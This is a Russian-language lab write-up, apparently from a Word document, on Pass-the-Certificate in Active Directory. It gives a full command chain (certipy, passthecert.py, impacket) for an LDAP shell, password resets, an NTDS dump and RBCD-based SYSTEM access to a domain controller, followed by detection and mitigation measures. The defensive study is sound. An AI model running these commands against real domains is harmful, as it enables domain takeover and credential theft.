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Аутентификация по сертификату (Pass-the-Certificate):</w:t>
        <w:br/>
        <w:t>эксплуатация AD CS, связка с RBCD и меры обнаружения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техники компрометации домена через сертификаты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анализируется техника Pass-the-Certificate (PassTheCert) — постэксплуатационный приём аутентификации в Active Directory с использованием сертификата X.509 и соответствующего закрытого ключа вместо пароля или хеша. Рассмотрены лежащие в основе механизмы PKINIT и Schannel, а также цепочка компрометации домена при связке с ограниченным делегированием на основе ресурсов (RBCD). Систематизированы демонстрационные команды (certipy, passthecert.py, impacket); основное внимание уделено мерам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Active Directory; AD CS; Pass-the-Certificate; PKINIT; Schannel; RBCD; эскалация привилегий.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Pass-the-Certificate — постэксплуатационная техника, использующая сертификат X.509 и его закрытый ключ для аутентификации в службах Active Directory без знания пароля пользователя. Она опирается на два механизма: PKINIT (аутентификация Kerberos на основе открытого ключа) и Schannel (аутентификация по сертификату поверх LDAP, SMB и смежных служб). Опасность обусловлена тем, что техника обходит парольные политики, MFA и пороги блокировки, сертификаты имеют длительный срок действия, а при недостаточном мониторинге сертификатов и Schannel атака может оставаться незамеченной и, в связке с RBCD, приводить к полной компрометации домена. Цель работы — проанализировать цепочку с позиции защитника и систематизировать меры обнаружения.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>2. Испытательный стенд и исходные условия</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Инфраструктура: Windows Server 2019 с Active Directory, поддержкой PKINIT и развёрнутой AD CS с центром сертификации; домен ignite.local; контроллер домена DC01 (192.168.1.20); атакующий узел Kali Linux. Предполагается, что в результате предшествующей атаки на AD CS получен привилегированный файл сертификата (administrator.pfx). Инструменты: Certipy-ad, passthecert.py, NetExec и утилиты Impacket. В командах пароли заменены плейсхолдерами.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>3. Подготовка сертификата</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Разделение PFX на сертификат и закрытый ключ для совместимости с TLS/LDAP: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certipy-ad cert -pfx administrator.pfx -nokey -out admin.crt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certipy-ad cert -pfx administrator.pfx -nocert -out admin.key</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>4. Аутентификация и действия через Schannel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4.1. Интерактивная LDAP-оболочка от имени администратора через TLS Schannel (в обход Kerberos):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ldap-shell -crt admin.crt -key admin.key \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-domain ignite.local -dc-ip 192.168.1.20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4.2. Сброс пароля пользователя и повышение привилегий; проверка доступа через NetExec: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modify_user -crt admin.crt -key admin.key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-domain ignite.local -dc-ip 192.168.1.20 -target sanjeet -new-pass &lt;password&gt;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modify_user -crt admin.crt -key admin.key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-domain ignite.local -dc-ip 192.168.1.20 -target raj -elevate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smb 192.168.1.20 -u raj -p '&lt;password&gt;' --ntds</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>5. Связка с RBCD и компрометация домена</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>5.1. Создание машинной учётной записи и настройка делегирования (msDS-AllowedToActOnBehalfOfOtherIdentity):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add_computer -crt admin.crt -key admin.key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-domain ignite.local -dc-ip 192.168.1.20 -computer-name HULK -computer-pass &lt;password&gt;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write_rbcd -crt admin.crt -key admin.key \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-domain ignite.local -dc-ip 192.168.1.20 -delegate-to DC01$ -delegate-from HULK$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>5.2. Запрос сервисного билета с олицетворением администратора и получение оболочки SYSTEM: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impacket-getST ignite.local/'HULK$':&lt;password&gt; -spn cifs/DC01.ignite.local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-impersonate administrator -dc-ip 192.168.1.20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export KRB5CCNAME=administrator@cifs_DC01.ignite.local@IGNITE.LOCAL.ccache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impacket-psexec ignite.local/administrator@DC01.ignite.local -k -no-pass -dc-ip 192.168.1.20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>5.3. Проверка и очистка конфигурации делегирования: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read_rbcd  ... -delegate-to DC01$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python3 passthecert.py -action flush_rbcd ... -delegate-to raj</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>6. Обнаружение и меры противодействия</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Поскольку техника опирается на легитимные механизмы аутентификации по сертификату, защита строится на их контроле. Выпуск сертификатов следует ограничить доверенными административными ролями и аудировать шаблоны AD CS. Необходим мониторинг аномального использования сертификатов и Schannel-привязок к контроллерам домена, а также аудит изменений атрибута msDS-AllowedToActOnBehalfOfOtherIdentity (признак настройки RBCD). Следует журналировать смены паролей, инициированные из оболочек, аутентифицированных по сертификату, регулярно инвентаризировать и удалять избыточные ACL RBCD и права создания машинных учётных записей (ms-DS-MachineAccountQuota). Дополнительно: защита закрытых ключей и файлов PFX, сокращение срока действия сертификатов и контроль их отзыва, многоуровневое администрирование (Tier 0).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Pass-the-Certificate эксплуатирует механизмы PKINIT и Schannel, позволяя аутентифицироваться по сертификату и ключу без пароля, обходя парольные политики, MFA и блокировки. В связке с RBCD техника обеспечивает полную компрометацию домена без традиционного перехвата учётных данных. Защита требует строгого контроля выпуска сертификатов, мониторинга аутентификации через Schannel, аудита настроек делегирования и защиты закрытых ключей. Ключевой вывод: сертификат уровня Tier 0 эквивалентен привилегированной учётной записи и должен управляться как таковой.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AlmondOffSec. PassTheCert: authenticate against LDAP/Schannel using a certificate. GitHub repository.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2. ly4k. Certipy: Active Directory Certificate Services enumeration and abuse. GitHub repository.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3. SpecterOps. Certified Pre-Owned: abusing Active Directory Certificate Services (whitepaper).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4. MITRE ATT&amp;CK. Steal or Forge Authentication Certificates (T1649); Use Alternate Authentication Material (T1550).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>5. Microsoft. Resource-Based Constrained Delegation and msDS-AllowedToActOnBehalfOfOtherIdentity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